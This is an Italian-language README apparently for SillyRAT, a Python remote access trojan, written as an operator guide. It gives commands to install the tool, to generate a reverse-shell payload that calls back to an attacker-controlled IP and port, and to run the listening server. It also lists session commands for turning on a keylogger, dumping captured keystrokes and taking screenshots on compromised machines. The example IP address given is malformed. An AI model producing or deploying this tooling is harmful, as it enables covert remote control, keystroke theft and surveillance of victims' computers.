
Un RAT basato su Python 🐀 (Trojan per Accesso Remoto) per ottenere reverse shell 🖥️

Un RAT multipiattaforma scritto in puro Python. Il RAT accetta comandi insieme agli argomenti per agire come server che accetta connessioni o come client/target che stabilisce connessioni al server. Il comando generate usa il modulo pyinstaller per compilare il codice del payload effettivo. Quindi, per generare un file payload per la tua piattaforma specifica, devi essere su quella piattaforma durante la generazione del file. Inoltre, puoi ottenere direttamente anche il file sorgente.
Lo strumento è testato su Parrot OS con Python 3.8. Segui i passaggi per l'installazione:
$ git clone https://github.com/hash3liZer/SillyRAT.git
$ cd SillyRAT/
$ pip3 install -r requirements.txt
Puoi ottenere il file payload in due modi:
$ python3 server.py generate --address 134.276.92.1 --port 2999 --output /tmp/payload.py --source
La versione compilata deve essere generata sulla piattaforma specifica. Ad esempio, non puoi generare un file .exe su Linux. Devi essere specificamente su Windows. Lo strumento è ancora in fase di test. Quindi tutti i tipi di errori sono accettati. Assicurati comunque di aprire un issue. Generare la versione compilata per Linux:
$ python3 server.py generate --address 134.276.92.1 --port 2999 --output /tmp/filer

Sostituisci il tuo indirizzo IP e la porta nei comandi sopra.
Il server deve essere eseguito su Linux. Puoi acquistare un VPS o un Cloud Server per le connessioni. Per cronaca, il server non salva alcuna sessione dall'ultima esecuzione. Quindi tutto il progresso andrà perso una volta che l'applicazione server viene terminata. Avviare il server:
$ python3 sillyrat.py bind --address 0.0.0.0 --port 2999
Tutte le connessioni saranno elencate sotto il comando sessions:
$ sessions

Puoi connetterti alla sessione target con il comando connect e lanciare uno dei comandi disponibili:
$ connect ID
$ keylogger on
$ keylogger dump
$ screenshot

Ottieni una lista dei comandi disponibili:
$ help
Aiuto su un comando specifico:
$ help COMANDO
Twitter: @hash3liZer
Discord: TheFlash2k#0407